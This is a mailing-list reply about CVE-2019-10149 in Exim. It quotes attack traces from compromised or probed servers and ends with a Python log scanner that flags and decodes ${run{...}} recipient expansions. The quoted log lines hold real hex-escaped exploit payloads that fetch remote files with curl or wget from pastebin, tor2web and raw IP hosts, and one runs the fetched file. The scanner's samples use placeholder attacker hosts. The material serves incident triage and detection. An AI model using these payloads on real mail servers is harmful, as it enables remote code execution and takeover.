Re: [exim] CVE-2019-10149: already vulnerable ?

Author: Heiko Schlittermann
Date:
To: exim-users
Subject: Re: [exim] CVE-2019-10149: already vulnerable ?
Hi,

Benoît PELISSIER via Exim-users <exim-users@???> (Fr 21 Jun 2019 09:00:17 CEST):
> My mail system has been hacked ? CVE-2019-10149 ?


At least it was under attack.

> exim --version
> Exim version 4.89 #1 built 28-May-2019 20:13:55
> aptitude show exim4-config
> Paquet : exim4-config
> Version : 4.89-2+deb9u4


The version is fine.
But the question is, when did you install this version?

> 19h 679 1hdvRz-0006wq-0C <> *** frozen ***
>
> ${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost


Check your system for unusual activities.
Symptoms on a hacked system I became aware of were quite similar. The log
reported too many Received headers:

root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
2019-06-20 15:13:33 Received from <> H=(<zensored>.de) [89.248.171.57] P=smtp S=1114
2019-06-20 15:13:33 routing failed for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zensored>.de: Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)

That would have been a better line in the logs (from a fixed system):
2019-06-19 04:07:40 H=(service.com) [68.183.4.19] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20213.227.155.101\x2ftmp\x2f212.80.235.131\x22}}@localhost>: relay not permitted

    Best regards from Dresden/Germany
    Viele Grüße aus Dresden
    Heiko Schlittermann
--
 SCHLITTERMANN.de ---------------------------- internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --------------- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01 ------------ -
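The two log lines Heiko contrasts above (a message that was accepted and reached routing, versus a RCPT refused on a fixed system) are the log fingerprint a defender has for this CVE. The following is an added Python example, not code from the thread or from the Exim project: it scans constructed main-log lines for a ${run{...}} expansion item in a recipient local part, decodes the \xHH escapes so an analyst can read the embedded command, and labels each hit by whether the server rejected or accepted it. Hosts, IPs, message ids and paths in the sample lines are placeholders.

```python
import re

# Constructed sample Exim main-log lines (placeholder hosts, TEST-NET IPs),
# shaped like the ones quoted in the thread: one accepted message whose local
# part carried a ${run{...}} expansion, and one refused at RCPT TO.
SAMPLE_LOG = r"""
2019-06-20 15:13:33 Received from <> H=(example.test) [192.0.2.10] P=smtp S=1114
2019-06-20 15:13:33 routing failed for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2dT\x2036\x20https\x3a\x2f\x2fattacker.invalid\x2fsrc\x2fx\x20\x2dO\x20\x2froot\x2f\x2estage\x22}}@example.test: Too many "Received" headers - suspected mail loop
2019-06-19 04:07:40 H=(service.test) [192.0.2.11] F=<support@example.test> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20198.51.100.5\x2ftmp\x2fstage\x22}}@localhost>: relay not permitted
2019-06-19 04:08:00 1abcde-000001-AB <= alice@example.test H=(mail.example.test) [192.0.2.12] P=esmtp S=2048
"""

# "${run{...}}" is an Exim string-expansion item. A legitimate local part never
# contains one, so its presence in a recipient is the fingerprint, whatever
# command is embedded.
RUN_ITEM = re.compile(r'\$\{run\{(?P<body>.*?)\}\}')
# Subset of Exim expansion escapes seen in these payloads: \xHH, \n, \r, \t, \\.
# Assumption: this subset is enough for triage; other sequences stay untouched.
ESCAPE = re.compile(r'\\(?:x(?P<hex>[0-9a-fA-F]{2})|(?P<simple>[ntr\\]))')
HOST_IP = re.compile(r'\[(\d{1,3}(?:\.\d{1,3}){3})\]')


def decode_exim_escapes(text: str) -> str:
    r"""Turn \xHH-style escapes into readable text so an analyst can see
    which command the expansion would have handed to ${run{...}}."""
    simple = {'n': '\n', 'r': '\r', 't': '\t', '\\': '\\'}

    def one(m: re.Match) -> str:
        if m.group('hex') is not None:
            return chr(int(m.group('hex'), 16))
        return simple[m.group('simple')]

    return ESCAPE.sub(one, text)


def find_run_expansions(log_text: str) -> list[dict]:
    """Scan main-log lines and return one record per ${run{...}} sighting.
    'rejected' = refused at RCPT (the line a fixed server writes);
    'accepted' = the message got past SMTP, so the host needs investigating."""
    hits = []
    for line in log_text.strip().splitlines():
        m = RUN_ITEM.search(line)
        if not m:
            continue
        ip = HOST_IP.search(line)
        hits.append({
            'timestamp': line[:19],
            'outcome': 'rejected' if 'rejected RCPT' in line else 'accepted',
            'ip': ip.group(1) if ip else None,
            'decoded': decode_exim_escapes(m.group('body')),
        })
    return hits


if __name__ == '__main__':
    for h in find_run_expansions(SAMPLE_LOG):
        print(f"{h['timestamp']} {h['outcome']:8} ip={h['ip']} cmd={h['decoded']!r}")
```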